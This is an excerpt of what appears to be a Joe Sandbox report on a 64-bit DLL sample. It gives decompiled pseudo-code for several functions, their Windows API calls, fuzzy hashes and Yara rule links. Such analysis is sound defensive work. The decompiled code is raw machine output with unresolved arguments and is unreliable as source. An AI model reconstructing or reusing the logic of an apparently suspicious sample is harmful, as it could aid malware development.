HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
String ID:
API String ID: 45859668-0
Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800033B4 Relevance: 6.4, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
				void* __rdi;
				intOrPtr _t65;
				intOrPtr _t87;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t105;
				signed long long _t107;
				void* _t112;
				void* _t120;
				signed long long _t123;
				signed long long _t130;
				intOrPtr* _t131;
				intOrPtr _t139;
				void* _t154;
				intOrPtr _t155;
				void* _t157;
				signed long long _t159;
				intOrPtr* _t160;
				void* _t163;
				void* _t165;
				void* _t166;
				intOrPtr* _t171;
				void* _t179;
				signed long long _t181;
				signed long long _t182;
				int _t185;
				int _t187;
				void* _t191;

				 *((long long*)(_t165 + 0x18)) = __rbx;
				 *((long long*)(_t165 + 0x10)) = __rdx;
				 *((long long*)(_t165 + 8)) = __rcx;
				_t166 = _t165 - 0x660;
				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
				r13d = r9d;
				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
				r9d = r9d - 1;
				_t123 = r9d - 1;
				if (__eflags < 0) goto 0x80003400;
				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
				_t105 = __r9 + 1;
				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
				if (_t105 == 0) goto 0x80003641;
				_t13 = _t123 + 0x20; // 0x20
				r14d = _t13;
				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
				_t112 = 0 - r14d;
				if (_t112 >= 0) goto 0x8000342d;
				if (_t112 != 0) goto 0x80003422;
				r14d = r14d - 1;
				r8d = _t105;
				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
				memset(_t191, _t187, _t185);
				_t16 = _t166 + 0x250; // 0x249
				r9d = r13d;
				r8d = r14d;
				_t130 = _t185 << 2;
				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
				_t17 = _t166 + 0x40; // 0x39
				r9d = _t105;
				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
				memset(_t163, ??);
				r13d = r13d - _t105;
				_t139 = _t105;
				_t181 = r13d;
				 *(_t166 + 0x30) = _t181;
				if (_t112 < 0) goto 0x800035ee;
				_t124 = _t181 + _t139;
				_t28 = _t181 * 4; // 0x249
				_t160 = _t166 + _t28 + 0x250;
				r9d = 0xffffffff;
				_t31 = _t124 * 4; // 0x249
				_t131 = _t166 + _t31 + 0x250;
				if (_t100 != r9d) goto 0x800034d0;
				_t101 =  *_t131;
				goto 0x800034fb;
				r8d = _t155 + 1;
				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
				_t44 = _t166 + 0x40; // 0x39
				_t171 = _t160;
				r10d = _t105;
				if (_t101 == 0) goto 0x8000357a;
				r12d = 0xffffffff;
				r9d =  *_t44;
				_t87 =  *_t160;
				r10d = r10d + r12d;
				_t176 = __r9 * _t163;
				 *_t171 = _t87;
				if (_t87 - r12d <= 0) goto 0x80003548;
				goto 0x8000354a;
				 *_t171 =  *_t171 - r9d;
				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
				goto 0x80003567;
				if (r10d != 0) goto 0x80003517;
				_t107 =  *((intOrPtr*)(_t166 + 0x28));
				_t182 =  *(_t166 + 0x30);
				 *_t131 =  *_t131 - 0 + 0 + r11d;
				if ( *_t131 != 0) goto 0x80003595;
				_t47 = _t166 + 0x40; // 0x39
				r8d = _t107;
				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
				if (_t120 < 0) goto 0x800035ae;
				_t48 = _t166 + 0x40; // 0x39
				r9d = _t107;
				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
				goto 0x8000357c;
				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
				r13d = r13d - 1;
				 *(_t166 + 0x30) = _t182 - 1;
				r9d = 0xffffffff;
				if (_t120 >= 0) goto 0x800034c7;
				r14d =  *((intOrPtr*)(_t166 + 0x20));
				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
				memset(??, ??, ??);
				_t57 = _t166 + 0x250; // 0x249
				r9d = _t107;
				r8d = r14d;
				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
				r8d = 0x40c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

0x1800033b4
0x1800033b9
0x1800033be
0x1800033ce
0x1800033d5
0x1800033dd
0x1800033e0
0x1800033f1
0x1800033f4
0x1800033f8
0x1800033fe
0x180003400
0x180003404
0x18000340a
0x18000341a
0x18000341a
0x180003420
0x180003422
0x180003425
0x18000342b
0x18000342d
0x180003430
0x180003441
0x180003446
0x18000344b
0x180003456
0x180003459
0x18000345f
0x180003463
0x180003468
0x18000346d
0x180003473
0x18000347a
0x18000347f
0x180003490
0x180003494
0x180003499
0x18000349c
0x18000349f
0x1800034a2
0x1800034a7
0x1800034ad
0x1800034b1
0x1800034b1
0x1800034b9
0x1800034bf
0x1800034bf
0x1800034ca
0x1800034cc
0x1800034ce
0x1800034d3
0x1800034f7
0x1800034fd
0x180003505
0x180003508
0x18000350d
0x180003511
0x18000351a
0x180003520
0x180003524
0x180003527
0x18000353a
0x18000353f
0x180003546
0x18000354a
0x18000355c
0x180003563
0x18000356f
0x180003571
0x180003575
0x18000357a
0x18000357f
0x180003581
0x180003586
0x180003591
0x180003593
0x180003595
0x18000359a
0x1800035aa
0x1800035ac
0x1800035be
0x1800035c9
0x1800035cd
0x1800035d5
0x1800035db
0x1800035e1
0x1800035ee
0x1800035ff
0x180003604
0x18000360c
0x18000360f
0x180003615
0x180003624
0x18000362a
0x180003636
0x18000365b

APIs

memset.NTDLL ref: 0000000180003446
memset.NTDLL ref: 0000000180003494
memset.NTDLL ref: 00000001800035FF
memset.NTDLL ref: 000000018000362A
memset.NTDLL ref: 000000018000363C

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007760 Relevance: 6.4, APIs: 5, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 000000018000783B
HeapFree.KERNEL32 ref: 000000018000787A
memcmp.NTDLL ref: 00000001800078A0
memcmp.NTDLL ref: 00000001800078C6
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180006A05), ref: 0000000180007930

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: memcmp$FreeHeap
String ID:
API String ID: 1680564963-0
Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001EEC Relevance: 6.4, APIs: 5, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				signed int _t65;
				unsigned int _t66;
				signed int _t73;
				void* _t78;
				unsigned int _t85;
				void* _t87;
				void* _t91;
				void* _t112;
				int _t116;
				long long _t122;
				void* _t125;
				void* _t126;
				int _t143;
				void* _t145;
				void* _t148;

				_t78 = __eflags;
				_t87 = _t125;
				 *((long long*)(_t87 + 0x10)) = __rbx;
				 *((long long*)(_t87 + 0x18)) = _t122;
				 *((long long*)(_t87 + 8)) = __rcx;
				_t126 = _t125 - 0x860;
				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
				_t91 = __rdx;
				 *(_t126 + 0x30) = _t148 << 2;
				memcpy(_t148, _t145, _t143);
				_t9 = _t126 + 0x454; // 0x4a5
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
				_t13 = _t126 + 0x658; // 0x6a9
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
				memset(_t112, _t116);
				 *((intOrPtr*)(_t126 + 0x40)) = 1;
				_t73 = __edi - 1;
				if (_t78 < 0) goto 0x80001faa;
				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
				r12d = _t73;
				if (_t73 < 0) goto 0x80002081;
				_t65 =  *(__r8 + _t73 * 4);
				if (_t73 != r12d) goto 0x80001fe8;
				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
				_t66 = _t65 << 2;
				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
				if (0x10000001e == 0) goto 0x80002075;
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				_t85 = _t66 >> 0x1e;
				if (_t85 == 0) goto 0x80002068;
				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
				if (_t85 != 0) goto 0x80001fef;
				if (_t85 >= 0) goto 0x80001fbb;
				memcpy(??, ??, ??);
				r8d = 0x60c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

0x180001eec
0x180001eec
0x180001eef
0x180001ef3
0x180001ef7
0x180001f03
0x180001f0a
0x180001f22
0x180001f2c
0x180001f31
0x180001f46
0x180001f51
0x180001f56
0x180001f6b
0x180001f76
0x180001f7b
0x180001f8a
0x180001f8f
0x180001f9a
0x180001fa0
0x180001fa8
0x180001faa
0x180001fb5
0x180001fbb
0x180001fc8
0x180001fd0
0x180001fd2
0x180001fde
0x180001fe2
0x180002006
0x18000200b
0x180002027
0x18000202c
0x180002036
0x180002038
0x18000205e
0x180002063
0x18000206f
0x18000207b
0x180002093
0x1800020a2
0x1800020a8
0x1800020b4
0x1800020da

APIs

memcpy.NTDLL ref: 0000000180001F31

Part of subcall function 0000000180003934: memset.NTDLL ref: 0000000180003985

memset.NTDLL ref: 0000000180001F8A
memcpy.NTDLL ref: 0000000180002093
memset.NTDLL ref: 00000001800020A8
memset.NTDLL ref: 00000001800020BA

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006108 Relevance: 6.4, APIs: 5, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
				long long _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				intOrPtr _t40;
				void* _t56;
				void* _t57;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr* _t73;
				signed long long _t90;
				void* _t92;
				void* _t108;
				void* _t110;
				intOrPtr* _t112;

				_t72 = __rbx;
				_a16 = __rbx;
				_a8 = __rcx;
				_t69 =  *0x8000d4a0;
				_t57 = r8d;
				_v72 =  *((intOrPtr*)(_t69 + 8));
				_t8 = _t90 + 8; // 0x8
				r14d = _t8;
				HeapAlloc(??, ??, ??);
				if (_t69 == 0) goto 0x8000627d;
				if (_t57 == 0) goto 0x800061f7;
				_t112 = __rdx + 0x20;
				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
				if (_t69 == 0) goto 0x800061ec;
				r9d =  *((intOrPtr*)(_t112 - 8));
				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
				HeapFree(??, ??, ??);
				_t40 = _a24;
				if (_t40 == 0) goto 0x800061ec;
				_t56 = 0 + _t40;
				if (1 - _t57 < 0) goto 0x80006176;
				r14d = 8;
				if (1 != _t57) goto 0x80006225;
				_v88 = _a64;
				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
				if (_t56 == 0) goto 0x8000626f;
				_t31 =  &_a8; // 0x8
				_t73 = _t31;
				if ( *_t73 == 0) goto 0x8000624b;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
				_t67 =  *((intOrPtr*)(_t73 + 0xc));
				if (_t67 == 0) goto 0x80006265;
				HeapFree(??, ??, ??);
				if (_t67 != 0) goto 0x80006238;
				HeapFree(??, ??, ??);
				return r14d;
			}

0x180006108
0x180006108
0x18000610d
0x180006121
0x180006128
0x180006148
0x18000614d
0x18000614d
0x180006151
0x18000615d
0x180006167
0x180006172
0x180006184
0x18000618f
0x180006191
0x1800061ae
0x1800061c0
0x1800061c7
0x1800061cd
0x1800061d6
0x1800061e2
0x1800061ea
0x1800061f1
0x1800061f9
0x180006218
0x180006222
0x180006232
0x180006234
0x180006234
0x18000623e
0x180006245
0x180006252
0x180006254
0x180006258
0x18000625f
0x18000626d
0x180006277
0x180006297

APIs

HeapAlloc.KERNEL32 ref: 0000000180006151
HeapFree.KERNEL32 ref: 00000001800061C7
HeapFree.KERNEL32 ref: 0000000180006245
HeapFree.KERNEL32 ref: 000000018000625F
HeapFree.KERNEL32 ref: 0000000180006277

Part of subcall function 0000000180006008: lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
Part of subcall function 0000000180006008: HeapAlloc.KERNEL32 ref: 0000000180006057
Part of subcall function 0000000180006008: _snprintf.NTDLL ref: 00000001800060B9
Part of subcall function 0000000180006008: lstrcpyA.KERNEL32 ref: 00000001800060DD

Part of subcall function 0000000180006344: Sleep.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
Part of subcall function 0000000180006344: GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063E6
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 00000001800063F2
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 0000000180006405
Part of subcall function 0000000180006344: lstrcpyA.KERNEL32 ref: 000000018000641D
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006444
Part of subcall function 0000000180006344: lstrcatA.KERNEL32 ref: 0000000180006450
Part of subcall function 0000000180006344: lstrlenA.KERNEL32 ref: 0000000180006482
Part of subcall function 0000000180006344: HeapAlloc.KERNEL32 ref: 000000018000649B

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
String ID:
API String ID: 2523292596-0
Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DBC Relevance: 6.2, APIs: 4, Instructions: 163
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v80;
				void* _v88;
				long _v96;
				signed int _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t55;
				signed int _t63;
				void* _t64;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t85;
				signed long long _t107;
				struct _FILETIME* _t110;
				void* _t128;
				void* _t129;
				long _t131;
				signed int _t132;
				void* _t135;
				void* _t137;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t150;
				long long _t151;
				void* _t153;
				signed long long _t155;
				void* _t157;

				_t148 = _t137;
				 *((long long*)(_t148 + 0x18)) = __r8;
				 *((long long*)(_t148 + 0x10)) = __rdx;
				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
				r14d = 0;
				_v104 =  *0x8000d498;
				_t129 = __rcx;
				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
				_t11 = _t155 + 1; // 0x1
				r12d = _t11;
				_v96 = _t131;
				goto 0x80007e24;
				_t132 = _v96;
				r12d = 2;
				_t14 =  &_a32; // 0xba
				_t15 =  &_v88; // 0x42
				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t150 = _v88;
				if (_t132 == 0) goto 0x80007e7d;
				_t55 = _a8;
				_t150[0xa] = 1;
				_t150[0x12] = _t132;
				_t150[0xd] = _t55;
				_t150[0x10] = _t55;
				_t24 = _t129 + 0xb0; // 0xb0
				r9d = 0;
				 *_t150 = _v104 ^ 0x62ade362;
				_t150[3] =  *(_t129 + 0x48);
				_t150[2] =  *(_t129 + 0x4c);
				_t29 =  &_a8; // 0xa2
				_v112 = _t29;
				_t31 =  &_v104; // 0x32
				_v120 = _t31;
				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
				HeapFree(_t128, _t131, _t135);
				if (r13d == 0) goto 0x80007eef;
				if (_t73 == 0) goto 0x80007ee4;
				if (_t73 != 0x10d2) goto 0x80007eef;
				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
				if (_t73 != 0) goto 0x80007fff;
				_t74 = _a8;
				_t151 = _v104;
				r13d =  *(_t129 + 0x4c);
				_t63 = E00000001180008C48(_t74, _t151);
				_t36 =  &_a8; // 0xa2
				r9d = 1;
				 *(_t129 + 0x48) = _t74;
				 *(_t129 + 0x4c) = _t63;
				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
				_t75 = _t64;
				if (_t64 != 0) goto 0x80007fef;
				 *_a16 = _t151;
				 *_a24 = _a8;
				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
				r14d = 1;
				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
				GetSystemTimeAsFileTime(_t110);
				if (r14d == 0) goto 0x80007fa2;
				_t107 =  *((intOrPtr*)(_t129 + 0x58));
				if (_v80 - _t107 <= 0) goto 0x80007fa2;
				_t47 = _t129 + 0xb0; // 0xb0
				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
				asm("lock or dword [edi+0xdc], 0x1");
				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
				if (_v96 == 0) goto 0x80007fdc;
				HeapFree(??, ??, ??);
				if (_t75 == 0) goto 0x80007fd4;
				if (_t75 != 0x10d2) goto 0x80007fdc;
				E00000001180008BC4(_t110, _t129, _v96);
				return _t75;
			}

0x180007dbc
0x180007dbf
0x180007dc3
0x180007dde
0x180007df5
0x180007df8
0x180007dfc
0x180007dff
0x180007e0a
0x180007e0e
0x180007e0e
0x180007e12
0x180007e17
0x180007e19
0x180007e1e
0x180007e24
0x180007e2c
0x180007e40
0x180007e46
0x180007e4e
0x180007e51
0x180007e54
0x180007e5c
0x180007e5e
0x180007e65
0x180007e6e
0x180007e73
0x180007e78
0x180007e81
0x180007e88
0x180007e93
0x180007e9a
0x180007ea2
0x180007ea7
0x180007eaf
0x180007eb4
0x180007eb9
0x180007ecb
0x180007ecd
0x180007ed6
0x180007eda
0x180007ee2
0x180007eea
0x180007ef1
0x180007ef7
0x180007efe
0x180007f03
0x180007f0c
0x180007f11
0x180007f19
0x180007f25
0x180007f28
0x180007f2b
0x180007f30
0x180007f34
0x180007f4a
0x180007f54
0x180007f5a
0x180007f5c
0x180007f66
0x180007f6d
0x180007f76
0x180007f78
0x180007f81
0x180007f83
0x180007f93
0x180007f95
0x180007fb1
0x180007fb8
0x180007fc2
0x180007fca
0x180007fd2
0x180007fd7
0x180007fee

APIs

Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77

HeapFree.KERNEL32 ref: 0000000180007ECD
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
HeapFree.KERNEL32 ref: 0000000180007FC2
HeapFree.KERNEL32 ref: 0000000180007FF7

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
String ID:
API String ID: 2852518528-0
Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005578 Relevance: 6.0, APIs: 4, Instructions: 37sleepmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055AF
Sleep.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055C1
CloseHandle.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055D9
HeapFree.KERNEL32(?,?,?,000000018000135E), ref: 00000001800055E7

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CloseEventFreeHandleHeapSleep
String ID:
API String ID: 1881548302-0
Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000137C Relevance: 5.2, APIs: 4, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
				void* __rbp;
				intOrPtr _t29;
				void* _t32;
				void* _t38;
				void* _t42;
				void* _t54;
				void* _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t61;
				void* _t65;
				signed int _t73;
				void* _t105;
				void* _t113;
				intOrPtr _t126;
				long long _t130;
				char* _t133;
				intOrPtr* _t140;
				long _t143;
				long _t145;
				void* _t148;
				void* _t150;
				void* _t151;
				intOrPtr* _t155;
				char* _t162;
				void* _t164;
				void* _t171;
				long _t173;
				int _t176;
				void* _t180;
				void* _t182;

				_t164 = __r10;
				_t140 = __rdx;
				_t130 = __rcx;
				 *((long long*)(_t150 + 0x10)) = __rbx;
				 *((long long*)(_t150 + 8)) = __rcx;
				_t151 = _t150 - 0x60;
				_t126 =  *0x8000d4a0;
				r14d = r8d;
